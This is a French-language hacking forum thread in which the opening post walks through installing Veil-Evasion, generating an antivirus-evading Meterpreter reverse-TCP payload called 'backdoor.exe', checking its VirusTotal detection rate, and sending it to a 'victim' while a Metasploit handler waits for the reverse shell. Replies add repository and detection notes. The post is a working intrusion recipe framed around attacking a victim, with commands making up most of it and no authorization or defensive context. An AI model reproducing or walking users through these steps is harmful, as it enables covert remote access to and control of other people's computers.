Annonce

Réduire
Aucune annonce.

[Metasploit]Veil.py

Réduire
X
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • [Metasploit]Veil.py

    Dernièrement j'avais envie de voir plus sur Metasploit et il s'avère que pas mal de scripts existent sur cette plateforme et permettent d'améliorer les (nombreux) outils déjà en place.

    Sachez que vous devrez avoir prévu à la base de l'espace mémoire pour stocker les nouveautés.

    J'ai découvert veil.py un encodeur de payload écrit en python sur un site qui permet de rendre les payloads de Metasploit(Meterpreter) peu détectables par les antivirii.

    Ce n'est pas du 100% FUD.

    Voici le lien : https://github.com/Veil-Framework/Veil-Evasion/

    Pour ce test, je suis sur Kali-Linux (dernière version en date à ce jour) où tous les outils nécessaires pour ce test sont pré-installés.

    Soit :

    Linux

    Kali (x86) où toutes les dépendances sont pré-installées.

    Ou :

    Installer :

    Python 2.7
    PyCrypto >= 2.3

    Sinon :

    Windows (par py2exe compilation)

    Python (testé avec x86 - - http://www.python.org/download/releases/2.7/)
    Py2Exe (http://sourceforge.net/projects/py2e.../py2exe/0.6.9/)
    PyCrypto (http://www.voidspace.org.uk/python/modules.shtml)
    PyWin32 (http://sourceforge.net/projects/pywi...7.exe/download)

    Test :

    Téléchargement de l'archive.

    Code:
    wget https://github.com/veil-evasion/Veil/archive/master.zip

    Le dézipper (moi j'ai configuré un dézzipeur, mais si ce n'est pas votre cas) :

    Code:
    unzip master.zip

    Lancement de l'installation :

    Code:
    cd Veil-Evasion-master/setup/ && ./setup.sh
    On se déplace dans le dossier cd Veil-Evasion-master/setup/ et de là on exécute le fichier setup.sh

    Cette commande effectue les 3 en 1.

    Si l'install ne démarre pas, vérifiez que le fichier a bien été téléchargé et qu'il est exécutable :

    Code:
    cd Veil-Evasion-master/setup/
    puis :

    Code:
    ls
    Patientez et mettez 'Yes' à chaque fois.


    Le téléchargement des dépendances et de mises à jour est long mais sont nécessaires au bon fonctionnement du Framework.

    Note : vous allez avoir vers la fin des "Problem: O:..." — ces erreurs n'ont aucune incidence sur la suite de l'installation et le fonctionnement de Veil : n'y prêtez donc pas attention et poursuivez l'install.

    Lorsque vous arrivez à la config de Wine, validez 'Ok' à chaque fois.


    Ensuite, lancez Veil :

    Code:
    cd Veil-Evasion-master
    Code:
    python Veil-Evasion.py

    tapez :

    [>] Please enter a command: list

    Puis sélectionner un payload (pour ce test nous allons prendre le 5eme : '5) c/meterpreter/rev_tcp'

    [>] Please enter a command:5

    Configurez le payload avec la commande suivante :

    Code:
    set LHOST <IP>
    Mettez votre IP (si vous ne la connaissez pas ouvrez un terminal annexe et rentrez ifconfig)

    [>] Please enter a command:generate

    Là on nous demande de donner un nom à notre payload. Je mets tout simplement 'backdoor' comme nom.


    Cliquez sur 'Enter' puis au main menu rentrez 'exit' afin de quitter proprement Veil.

    [>] Please enter a command:exit

    Allez dans votre dossier veil-output/compiled


    Vous y trouverez donc votre backdoor.exe.

    Vérifions si notre payload est perçu comme clean.

    Analyse Virus Total :


    15/54. C'est correct.

    Reste plus qu'à envoyer notre backdoor.exe à notre victime et mettre un serveur en écoute à l'aide de metasploit.

    Mettre un serveur en écoute :

    > msfconsole
    > use exploit/multi/handler
    > set payload windows/meterpreter/reverse_tcp
    > set LHOST <ip>
    Il s'agit de l'IP locale (faites à nouveau ifconfig si nécessaire)
    > show options (pour vérifier que tout é bien été pris en compte)
    > exploit

    À partir de là, dès lors que votre victime exécutera backdoor.exe, meterpreter sera actif.

    Meterpreter > [commande]

    Envoyez vos commandes comme ceci, vous êtes à l'écoute !

    Si cela vous a plu je vous partagerai d'autres techniques d'amélioration des outils de base de Kali.
    Dernière modification par SAKAROV, 01 septembre 2014, 17h48.

  • #2
    Depuis la version 1.0.7 de Kali Linux Veil est dans les dépôts

    https://linuxtrack.net/viewtopic.php?id=998
    Dernière modification par Iddl3, 27 septembre 2016, 17h01.
    WITHOUT DEVIATION FROM THE NORM, PROGRESS IS NOT POSSIBLE
    -Frank Zappa

    Commentaire


    • #3
      Merci pour la précision je ne l'avais pas trouver sur coyotus.Je ne savais pas pour celui ci et la précision apporté encore Merci.

      Commentaire


      • #4
        Détectable par Avast Pro 9. Il n'est pas si mauvais que ça ce petit antivirus Créer sur Kali, testé sur windows 8

        Commentaire

        Chargement...
        X